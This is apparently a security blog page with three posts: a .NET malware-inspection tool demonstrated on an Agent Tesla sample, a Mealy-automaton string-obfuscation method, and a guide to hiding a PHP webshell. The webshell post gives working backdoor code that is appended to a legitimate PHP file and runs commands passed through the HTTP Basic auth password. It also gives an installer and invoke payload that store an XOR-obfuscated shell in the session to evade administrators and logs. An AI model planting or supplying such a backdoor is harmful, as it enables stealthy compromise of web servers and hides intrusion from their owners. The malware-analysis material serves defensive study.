Sunday, 12 November 2017

Shed - Inspect .NET malware like a Sir

When I start analyzing a new malware sample, a few initial tasks provide a lot of useful information and speed up the analysis. Two of them are of particular interest: extracting the embedded strings and dumping packed binaries. Unfortunately, this information is often obfuscated or not easy to retrieve. In this article I'll present a new tool, called Shed, which analyzes .NET programs in order to extract this information in an easy way.

You can find the full source code of the project and an already compiled binary in this GitHub project.

Introduction

The idea behind this tool is to make the extraction of strings that reside in memory easier and also to dump dynamically loaded binaries. I'll show you how to use Shed to analyze a well-known .NET RAT.

Dump the Heap

When a new object is created, it is stored in the managed heap. This memory area is managed by the .NET runtime, more specifically by the Garbage Collector, which is responsible for freeing unused memory when needed. This behavior is very handy for an analyst: the Garbage Collector does not reclaim memory unless it has to, so we have a good amount of time to inspect the heap and dump useful objects, like strings or byte arrays.

Thanks to the powerful Reflection capability provided by .NET, for each stored object we can extract the type and all associated fields. In this way we can reconstruct the memory representation of complex classes, which can provide useful insight into the inner workings of the malware.

Modules dump

Another interesting capability when analyzing malware is dumping dynamically loaded Assemblies. This case is pretty common, since most .NET malware stores the main Assembly in some kind of encrypted form and loads it only at runtime.

A very useful tool for dumping dynamically loaded Assemblies already exists: MegaDumper. However, since it is not open source (on GitHub you can find a decompiled version) and I had never written a PE dumper, I decided to create my own tool :)

In order to dump an Assembly we have to dump the related PE file from memory. This operation can be pretty challenging, and a lot depends on how the malware was protected.

A naive approach is to identify the start of the PE file and read PE->SizeOfImage bytes from there. The main problem with this approach is that nowadays most malware uses Process Hollowing ([1]) to inject its content into a newly created process. This implies that the PE is not mapped in a contiguous memory area, so a single read of that size is not possible.

A better strategy is to parse the PE header and reconstruct the binary by reading all sections from memory.
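The section-by-section strategy can be sketched in a few lines of Python. This is only an illustration of the idea and not the code used by Shed: `read_mem` is a hypothetical callback that reads bytes from the target process at a given offset from the image base, and the sketch assumes that the headers found in memory are intact and that the raw sizes they declare can be trusted, which a protected sample may violate.

```python
import struct

def rebuild_pe(read_mem):
    """Rebuild a file-layout PE from a memory-mapped image.

    read_mem(rva, size) is a hypothetical callback returning the bytes
    found in the target process at image_base + rva.
    """
    dos = read_mem(0, 0x40)
    if dos[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", dos, 0x3C)[0]

    # PE signature (4 bytes) followed by the 20-byte COFF file header
    nt = read_mem(e_lfanew, 24)
    if nt[:4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    num_sections = struct.unpack_from("<H", nt, 6)[0]
    opt_size = struct.unpack_from("<H", nt, 20)[0]

    opt_off = e_lfanew + 24
    # SizeOfHeaders is at offset 60 of the optional header (PE32 and PE32+)
    size_of_headers = struct.unpack("<I", read_mem(opt_off + 60, 4))[0]

    # The headers are copied as they are, then every section is moved
    # from its virtual address back to its raw file offset.
    out = bytearray(read_mem(0, size_of_headers))
    sec_table = opt_off + opt_size
    for i in range(num_sections):
        hdr = read_mem(sec_table + 40 * i, 40)
        # VirtualAddress, SizeOfRawData, PointerToRawData
        vaddr, raw_size, raw_ptr = struct.unpack_from("<III", hdr, 12)
        data = read_mem(vaddr, raw_size).ljust(raw_size, b"\0")
        end = raw_ptr + raw_size
        if len(out) < end:
            out.extend(b"\0" * (end - len(out)))
        out[raw_ptr:end] = data
    return bytes(out)
```

Since each section is read separately, the sections do not need to be contiguous in memory, as long as each one can be read on its own.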

One important step when dumping a .NET Assembly is fixing the PE Entry Point. Let us analyze the Entry Point of a managed PE file:
[0x0043d9de]> pd 1
;-- entry0:
0x0043d9de    ff2500204000   jmp dword [sym.imp.mscoree.dll__CorExe
The code jumps to the _CorExeMain routine. From MSDN ([2]) we can read that it:

Initializes the common language runtime (CLR), locates the managed entry point in the executable assembly's CLR header, and begins execution.

So we need to set the Entry Point of the reconstructed binary to a piece of code which jumps to this function. The last missing part is obtaining the address of this function, which can be done by walking the Import Address Table and locating it.
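As a small illustration, the stub from the disassembly above is just the two opcode bytes FF 25 followed by the 32-bit address of the Import Address Table slot. The sketch below only builds those six bytes; `make_entry_stub` is a name I made up, it covers the 32-bit case only, and it assumes that the address of the slot has already been located.

```python
import struct

def make_entry_stub(iat_slot_va):
    """Encode `jmp dword [iat_slot_va]` for a 32-bit managed PE.

    iat_slot_va is the virtual address of the Import Address Table slot
    that holds the imported function (assumed to be already located).
    """
    return b"\xff\x25" + struct.pack("<I", iat_slot_va)

# The slot address used in the disassembly above
print(make_entry_stub(0x00402000).hex())  # prints ff2500204000
```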

Use case: Agent Tesla (cc518a6c63f56c4891b5e30e8cb97b26)

Let's see how to use Shed to analyze real-world malware: an Agent Tesla sample analyzed by Forcepoint in [3].

c:\Shed>Shed.exe --timeout 2000 --exe cc518a6c63f56c4891b5e30e8cb97b26.exe
    -=[ Shed .NET program inspector ]=-
Copyright (c) 2017 Antonio Parata - @s4tan

[+] Attached to pid: 160
[+] Created runtime: v2.0.50727.5420
...
[+] [System.String] 0x278043C: 0|0|0|0|0|0|0|0|0|0|18000|1|skpehostbrowaer.exe|Temp|AXKTOimGsklqIffPCompzbSmVnpwanUmzyjRJTSpqQzJHIASyqoYDvKR|0|0|0|0|0|0|0|IWIOzYrGb|0|0|0|0|0|0|NgjBaJMqu|OEeQOTHIoxSSUapGpFWjxLNzWbe|6|0|
[+] [System.String] 0x2780610: /c echo [zoneTransfer]ZoneID = 2 > 
[+] [System.String] 0x2780668: :ZONE.identifier & exit
[+] [System.String] 0x2780748: <?xml version="1.0" encoding="UTF-16"?><Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">  <RegistrationInfo>    <Date>2014-10-25T14:27:44.8929027</Date>    <Author>[USERID]</Author>  </RegistrationInfo>  <Triggers>    <LogonTrigger>      <Enabled>true</Enabled>      <UserId>[USERID]</UserId>    </LogonTrigger>    <RegistrationTrigger>      <Enabled>false</Enabled>    </RegistrationTrigger>  </Triggers>  <Principals>    <Principal id="Author">      <UserId>[USERID]</UserId>      <LogonType>InteractiveToken</LogonType>      <RunLevel>LeastPrivilege</RunLevel>    </Principal>  </Principals>  <Settings>    <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>    <AllowHardTerminate>false</AllowHardTerminate>    <StartWhenAvailable>true</StartWhenAvailable>    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>    <IdleSettings>      <StopOnIdleEnd>true</StopOnIdleEnd>      <RestartOnIdle>false</RestartOnIdle>    </IdleSettings>    <AllowStartOnDemand>true</AllowStartOnDemand>    <Enabled>true</Enabled>    <Hidden>false</Hidden>    <RunOnlyIfIdle>false</RunOnlyIfIdle>    <WakeToRun>false</WakeToRun>    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>    <Priority>7</Priority>  </Settings>  <Actions Context="Author">    <Exec>      <Command>[LOCATION]</Command>    </Exec>  </Actions></Task>
[+] [System.String] 0x2781308: [LOCATION]
[+] [System.String] 0x2781330: schtasks.exe

...
[+] Saved dynamic module: raobtmNqCzJjZpcUiyDwYSCM
[+] Saved dynamic module: Microsoft.VisualBasic.dll
[+] Result saved to c:\Shed\Result\160
[+] Detached
From the output we can see that a module with a weird name (raobtmNqCzJjZpcUiyDwYSCM) was dumped. This Assembly was decrypted and loaded by the first loader layer.

It is in charge of various operations and it also holds a configuration string:

0|0|0|0|0|0|0|0|0|0|18000|1|skpehostbrowaer.exe|Temp|AXKTOimGsklqIffPCompzbSmVnpwanUmzyjRJTSpqQzJHIASyqoYDvKR|0|0|0|0|0|0|0|IWIOzYrGb|0|0|0|0|0|0|NgjBaJMqu|OEeQOTHIoxSSUapGpFWjxLNzWbe|6|0|

This string specifies the time to sleep (18000 milliseconds) and the name to give to the real payload.
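Once the string is dumped, pulling out those two values is trivial. The snippet below is only a sketch: the field positions (10 for the sleep time, 12 for the payload name) are read off this single sample and may differ in other builds, and the meaning of the remaining fields is not covered here.

```python
CONFIG = ("0|0|0|0|0|0|0|0|0|0|18000|1|skpehostbrowaer.exe|Temp|"
          "AXKTOimGsklqIffPCompzbSmVnpwanUmzyjRJTSpqQzJHIASyqoYDvKR|"
          "0|0|0|0|0|0|0|IWIOzYrGb|0|0|0|0|0|0|NgjBaJMqu|"
          "OEeQOTHIoxSSUapGpFWjxLNzWbe|6|0|")

fields = CONFIG.split("|")
sleep_ms = int(fields[10])   # assumed position of the sleep time
payload_name = fields[12]    # assumed position of the payload file name

print(sleep_ms, payload_name)  # prints 18000 skpehostbrowaer.exe
```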

It is also in charge of ensuring persistence by creating a task with the XML configuration string displayed in the output. Finally, it decrypts the real payload and executes it with a .NET implementation of the RunPE technique, which uses Process Hollowing.

This loader was already analyzed in [4]. By using Shed, we can see that we were able to retrieve a lot of useful information without too much effort.

Moving on, in order to inspect the real payload, I executed the program and waited for a new process to be spawned. After this, I ran Shed against the newly created process as shown below:
c:\Shed>Shed.exe --pid 3652
    -=[ Shed .NET program inspector ]=-
Copyright (c) 2017 Antonio Parata - @s4tan

[+] Attached to pid: 3652
[+] Created runtime: v2.0.50727.5420
...
[+] [System.String] 0x297A798: <br>VideocardName&nbsp;: 
[+] [System.String] 0x297A7DC: <br>VideocardMem&nbsp;&nbsp;: 
[+] [System.String] 0x297A82C: <br>IP Address&nbsp;&nbsp;:
...
[+] Saved dynamic module: Microsoft.VisualBasic.dll
[+] Saved dynamic module: Microsoft.JScript.dll
[+] Saved dynamic module: IELibrary
[+] Saved dynamic module: System.Security.dll
[+] Result saved to c:\Shed\Result\3652
[+] Detached
This time the output is pretty huge. Among the dumped modules the most interesting ones are:

IELibrary (9759067EDF26E4A4E49B4E228C7DF81C)

It is used to interact with Internet Explorer in order to steal usernames, passwords and cookies, as can be seen by the following image:

no name (6030C0CFC40A6A69857454D5EB41D9FA)

This is the real Agent Tesla module, where we can see the routine in charge of decrypting the stored strings:


Heap inspection

As already said, even if the strings are stored in encrypted form, once decrypted they stay on the heap until the Garbage Collector reclaims the memory. If we take a look at the JSON file heap.json, we will see (apart from the enormous amount of information dumped) a lot of useful data, like the SMTP server and account used to exfiltrate data:

{
  "Address": 43845700,
  "Name": null,
  "Properties": [ ],
  "Reference": 0,
  "Type": "System.String",
  "Value": "gp4XXXXXX@zoho.com"
},
...
{
  "Address": 43864368,
  "Name": null,
  "Properties": [ ],
  "Reference": 0,
  "Type": "System.String",
  "Value": "poXXXXX8"
},
...
{
  "Address": 43871204,
  "Name": null,
  "Properties": [ ],
  "Reference": 0,
  "Type": "System.String",
  "Value": "smtp.zoho.com"
},
...
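Given the size of the dump, it helps to filter it with a few lines of code. The sketch below is based on assumptions: I take heap.json to be a JSON array of objects shaped like the ones shown above (with the Type and Value keys), and `heap_strings` is a hypothetical helper that does not walk the nested Properties.

```python
import json

def heap_strings(heap_json_text, needle=""):
    """Return the values of the System.String objects containing `needle`.

    Assumes the dump is a JSON array of objects with "Type" and "Value"
    keys, as in the excerpt above.
    """
    objects = json.loads(heap_json_text)
    return [o["Value"] for o in objects
            if o.get("Type") == "System.String"
            and isinstance(o.get("Value"), str)
            and needle in o["Value"]]
```

For example, `heap_strings(open("heap.json").read(), "smtp")` would list the candidate mail servers, if the file has the layout assumed above.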

Conclusion

I hope that you enjoyed this post and that you will find Shed useful in your analysis :)

References

[1] Process Hollowing
[2] _CorExeMain Function
[3] PART TWO - CAMOUFLAGE .NETTING
[4] Unpacking yet another .NET crypter

Saturday, 16 September 2017

Using a Mealy automaton for string obfuscation

Obfuscating strings is a very important aspect if you want to protect sensitive information. In the following post I'll present an alternative method to obfuscate strings by using a Mealy automaton.

You can find the full source code of the project in this GitHub project.

Introduction

From Wikipedia ([1]) we can read that a Mealy machine is a finite-state machine whose output values are determined both by its current state and the current inputs. There is plenty of information on the internet about this concept, so I will not go into further detail. What is interesting to us is that, given an automaton, we can feed it a specific input and get the computed string as output.

The idea of using a Mealy machine to obfuscate strings is not new and it was already presented in [2]. Unfortunately the book doesn't explain how to create a Mealy automaton in an automatic way. As creating an automaton manually for each string is very time consuming, I felt that a very important part was missing.
In the following paragraphs I'll try to fill this gap by providing you with a possible implementation.
In the final section we will see an example that uses the code presented in the book.

Why use a new method?

If you have ever reversed a binary which uses obfuscation, you might have noticed that most obfuscation strategies are based either on a known cryptographic algorithm or on a custom encoder built from ADD/XOR/ROL instructions. Both cases have advantages and disadvantages (XOR obfuscation is a weak method, see [3]), but both rest on the assumption that the data is stored in the binary in some encoded or encrypted form. In our case we convert the data into "code" that generates the decoded value at runtime.

For our purpose we will use a Mealy machine which has 0/1 as input. This choice will allow us to encode each letter with a bit, greatly reducing the input representation.

Implementation

Let's consider a simple automaton (created with [4]):


On each arrow there is the input and the associated output. If we consider state 0 as the initial one and pass the input string 0 1 1 0 1 0 0, we will receive the string ANTONIA as output.
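To make the mechanics concrete, here is a minimal Python sketch of how such a machine is run. The two tables are a hypothetical four-state machine that I wrote by hand so that the input above produces ANTONIA; it is not necessarily the automaton drawn in the figure, and the 'X' entries are filler for transitions that this input never takes.

```python
def run_mealy(next_state, output, bits, start=0):
    """Feed the bits to the machine and collect the emitted characters."""
    state, out = start, []
    for b in bits:
        out.append(output[state][b])   # character on the chosen arrow
        state = next_state[state][b]   # state the arrow points to
    return "".join(out)

# Hypothetical tables, indexed as table[state][input bit]
NEXT_STATE = [[1, 0], [0, 2], [0, 3], [1, 0]]
OUTPUT = [["A", "X"], ["X", "N"], ["I", "T"], ["O", "X"]]

print(run_mealy(NEXT_STATE, OUTPUT, [0, 1, 1, 0, 1, 0, 0]))  # prints ANTONIA
```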

Generating the automaton automatically by starting from the input turned out to be pretty challenging, so I changed strategy and built the automaton by starting from the output. For each character, the choice is between creating a new state and connecting to one of the already existing states. You can find the full F# source code implementation with a test example here.
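The following Python sketch shows one possible way to make that choice. It is not a port of the F# implementation: it is a simple backtracking search, written for illustration, that first tries to follow an arrow which already emits the wanted character, then tries to connect a free arrow to an existing state, and only as a last resort creates a new state. All the names are mine, unused arrows are filled with decoy characters taken from the text, and the search is meant for short strings only.

```python
def build_mealy(text):
    """Return (next_state, output, bits): feeding bits from state 0 emits text."""
    trans = [[None, None]]   # trans[state][bit] = (target, char) or None
    bits = []

    def solve(i, s):
        if i == len(text):
            return True
        c = text[i]
        # 1) follow an arrow that already emits the wanted character
        for b in (0, 1):
            edge = trans[s][b]
            if edge is not None and edge[1] == c:
                bits.append(b)
                if solve(i + 1, edge[0]):
                    return True
                bits.pop()
        # 2) otherwise use a free arrow of this state, if there is one
        for b in (0, 1):
            if trans[s][b] is None:
                bits.append(b)
                for t in range(len(trans)):      # connect to an existing state
                    trans[s][b] = (t, c)
                    if solve(i + 1, t):
                        return True
                trans.append([None, None])       # or create a new state
                trans[s][b] = (len(trans) - 1, c)
                if solve(i + 1, len(trans) - 1):
                    return True
                trans.pop()                      # undo and give up on this state
                trans[s][b] = None
                bits.pop()
                break
        return False

    if not solve(0, 0):
        raise RuntimeError("no automaton found")
    filler = text or "?"
    next_state = [[e[0] if e else 0 for e in row] for row in trans]
    output = [[e[1] if e else filler[(2 * s + b) % len(filler)]
               for b, e in enumerate(row)] for s, row in enumerate(trans)]
    return next_state, output, bits

def run_mealy(next_state, output, bits):
    """Replay the bits from state 0 to check the generated tables."""
    state, out = 0, []
    for b in bits:
        out.append(output[state][b])
        state = next_state[state][b]
    return "".join(out)
```

A quick check is to call `build_mealy("supersecretpassword")` and verify that `run_mealy` on the returned tables gives the original string back. The tables will most likely differ from the ones produced by the F# code, since many automata emit the same string.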

Testing

Now that we have an algorithm to generate the automaton, let's try to obfuscate some strings. Since the implementation was done in F#, I'll create a helper method that prints the automaton in a handy way, so that the result can be imported into a C program. Let's consider the string supersecretpassword. The automaton and the input generated from this string are (the result may be different on your machine):
Input text: supersecretpassword

Input: 1,1,0,0,0,1,0,0,0,0,1,0,1,0,1,1,1,1,0, Int: 250915

Output: {{'e', 's'}, {'e', 'u'}, {'p', 'e'}, {'e', 'a'}, 
        {'r', 'r'}, {'c', 'w'}, {'d', 't'}, {'s', 'd'}, 
        {'u', 's'}, {'p', 'w'}, {'a', 'o'}, {'d', 's'}, 
        {'s', 'p'}}

Automata: {{6, 1}, {5, 2}, {3, 2}, {4, 7}, {0, 11}, {4, 12}, 
          {12, 2}, {8, 4}, {12, 9}, {0, 10}, {6, 4}, {12, 7}, 
          {11, 10}}


Since the length of the string is less than 32 characters, we can convert the binary input into a DWORD. Now let's write a C program that reconstructs the given string:

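#include <stdio.h>

/* Walks the automaton starting from state 0. Each bit of key, least
   significant first, selects the transition to follow and the character
   to emit. text must have room for length + 1 bytes. */
void deobfuscate(char* text, int length, int key, char automata[][2], char output[][2])
{
 int v = 0, state = 0, i = 0;
 for (i = 0; i < length; i++)
 {
  v = key & 1;                 /* next input bit */
  key >>= 1;
  text[i] = output[state][v];  /* character emitted by this transition */
  state = automata[state][v];  /* move to the next state */
 }
 text[i] = '\0';
}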


int main()
{
 char text[20];
 int key = 250915;

 char automata[][2] =
 { { 6, 1 },{ 5, 2 },{ 3, 2 },{ 4, 7 },{ 0, 11 },
 { 4, 12 },{ 12, 2 },{ 8, 4 },{ 12, 9 },{ 0, 10 },
 { 6, 4 },{ 12, 7 },{ 11, 10 } };

 char output[][2] =
 { { 'e', 's' },{ 'e', 'u' },{ 'p', 'e' },{ 'e', 'a' },
 { 'r', 'r' },{ 'c', 'w' },{ 'd', 't' },{ 's', 'd' },
 { 'u', 's' },{ 'p', 'w' },{ 'a', 'o' },{ 'd', 's' },
 { 's', 'p' } };

 deobfuscate(text, sizeof(text)-1, key, automata, output);

 printf("Output: %s", text);
 return 0;
}


If we run this code we can see that the string "supersecretpassword" will be displayed in the console :)
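For reference, the integer key is just the bit list of the Input line packed least significant bit first, which is the order in which the C loop consumes it. A short sketch of the conversion (`bits_to_key` is a name of my choosing):

```python
def bits_to_key(bits):
    """Pack the input bits into an integer, first bit in the lowest position."""
    key = 0
    for i, b in enumerate(bits):
        key |= b << i
    return key

BITS = [1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 1, 0, 1, 0, 1, 1, 1, 1, 0]
print(bits_to_key(BITS))  # prints 250915
```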

Conclusion

I hope that you enjoyed this post as much as I enjoyed writing the code. If you find any errors or you know a better algorithm to build the Mealy automaton, just leave a comment or drop me an email ;)

References

[1] Mealy machine
[2] Surreptitious Software: Obfuscation, Watermarking, and Tamperproofing for Software Protection
[3] XORSearch & XORStrings
[4] Finite State Machine Designer

Sunday, 14 May 2017

Hiding PHP Webshell in an effective way

There are many reasons why you may want to hide your PHP Webshell, for example to avoid being caught by the system administrator during a penetration testing activity. In this post I'll propose a possible approach to do it.

Let's consider this scenario:
  • you are able to create a PHP file in the web root of the web server (for example by exploiting an arbitrary file upload, an RCE and so on...)
  • you want to use a shell that is a bit more complete than: eval($_GET['c'])
  • you want to be as stealthy as possible (speaking of both artifacts left on the filesystem and at a network level)
The first step is the creation of the PHP file that will accept our input. This file should be very small and possibly with no direct reference to code execution functions. Sucuri wrote some blog posts about possible ways to execute PHP code in an unusual way ([1], [2]), but in my opinion there is a clever way to execute PHP code by using "Variable functions" ([3], [4]).

This idea is pretty simple, let us see an example:
$fun = 'strrev';
print $fun('Hello');
The result will be: olleH

Cool, so we can create something like:
$f = $_GET['c'];
$f($_GET['p']);
and we can pass as c = eval and as p = <my evil code>. Unfortunately it will not work :\ From the Variable functions page we can read:

"Variable functions won't work with language constructs such as echo, print, unset(), isset(), empty(), include, require and the like. Use wrapper functions to employ any of these constructs as variable functions."

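Among the excluded functions there is also eval :( Ok, not too bad: if you know PHP, you will also know that the assert function behaves very similarly to eval when it is given a string, and it is allowed :) Note that this relies on older PHP versions: string arguments to assert() were deprecated in PHP 7.2 and removed in PHP 8.0.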

So, now we have a very simple PHP code that can execute arbitrary code with a very minimal footprint. The best choice would be to alter a legit .PHP file and append our short code to it, in this way no new files will be created on the file system. Now, our second concern is to cover our network trace.

To do this, we can opt for the GET method and pass the data via query string. This is probably the worst option, since the query string is logged by default in the web server log.

As an alternative we can use the POST method for our communication, but if you have added the PHP code to a legit page that doesn't accept POST data, this could look suspicious and attract the attention of the administrator. Also, in a log file the POST requests are considerably fewer than the GET requests, so they can be spotted easily by a system administrator.

We should find something that is considered a bad practice to be logged, something that, if implemented, could be classified as the CWE-532: Information Exposure Through Log Files. Yes, you got it, we will use a password field :) To be more precise the HTTP Basic Authorization Header. This value is also encoded in base64 and can be accessed from PHP without any need to do a decode first. So, in the end our code will be something like:
<?php

 if (isset($_SERVER['PHP_AUTH_PW'])) 
 {
  $a = explode("|", $_SERVER['PHP_AUTH_PW']); 
  @$a[0]($a[1]);
 }

?>
Now we need just one last step. The code that we want to execute should be more user-friendly than that raw shell, but we don't want to store it in a separate file in the web root: we need another place to store it that can be easily accessed by PHP.

The perfect solution seems to be the SESSION object. This object is typically serialized in a file in the temp directory (as default configuration), so it is very unlikely that a system administrator takes a look at those files for no reason.

Let's have a brief recap:
  1. we have a very short and simple PHP code, possibly embedded inside a legit PHP file
  2. we will use the Authorization header to communicate with our code, so that our data is not logged
  3. we will store the big PHP shell in the user session in order to be called later
Let's suppose that $webshell is the content that we want to store in the user session (a shell C99 style). Our first request will store the code in the user session. We will send as HTTP Basic password the following content:
  0                  1                     2                3
assert|eval(base64_decode(INSTALLER))|SESSION_KEY|base64(PHP_SHELLCODE)
The request will call the assert function (0), which in turn will call the eval function (1) (this is done to overcome the Variable Functions limitation) on a base64 decoded string (INSTALLER) which has this content:
session_start();
$a = explode("|", $_SERVER['PHP_AUTH_PW']);
$_SESSION[$a[2]] = $a[3];
This code just extracts the session key name (2) and the base64 encoded PHP web shell (3) (the content of $webshell) from the data, and saves the shell in the user session. Now we have a PHP webshell in our session that is just waiting to be invoked :)

We can do this by sending the following data:
assert|eval(base64_decode(INVOKE))
where the content of INVOKE is:
session_start();
if (array_key_exists("SESSION_KEY", $_SESSION))
{
    function xor_deobf($str, $key)
    {
       $out = '';
       for($i = 0; $i < strlen($str); ++$i)
          $out .= ($str[$i] ^ $key[$i % strlen($key)]);
       return $out;
    }
    eval(xor_deobf(base64_decode($_SESSION["SESSION_KEY"]), "MY_HARCODED_KEY"));
}
Basically it verifies that the given SESSION_KEY is present and if so its content is executed. I have used a simple XOR obfuscation layer to be even more stealthy.

Of course, $webshell should also use the same communication channel in order to be stealthy, otherwise you will lose your benefit :)

Conclusion

I hope that you have found this simple post useful. I created a simple Python script that is able to communicate with my code and execute commands.

You can find it at: https://gist.github.com/enkomio/c6db9cb690bbeac1476fb3e56bf7c1a4

You can invoke it with the following command:
phquirk.py http://www.example.com/legit_file_with_my_code.php "print 'Hello from my web shell';"
The result is:
[+] Using session value: PHPSESSID=d22838ce1683e0c9f7f634b10b
[+] Encryption key: d51313ea1fd9233dfe8c40eacfde35e7290aaec8533cc0dd78
[+] Saved command in user session
[+] Command result: Hello from my web shell

References

[1] PHP Backdoors: Hidden With Clever Use of Extract Function - https://blog.sucuri.net/2014/02/php-backdoors-hidden-with-clever-use-of-extract-function.html

[2] PHP Callback Functions: Another Way to Hide Backdoors - https://blog.sucuri.net/2014/04/php-callback-functions-another-way-to-hide-backdoors.html

[3] Variable functions - http://php.net/manual/en/functions.variable-functions.php

[4] A Look Into Creating A Truley Invisible PHP Shell - https://thehackerblog.com/a-look-into-creating-a-truley-invisible-php-shell/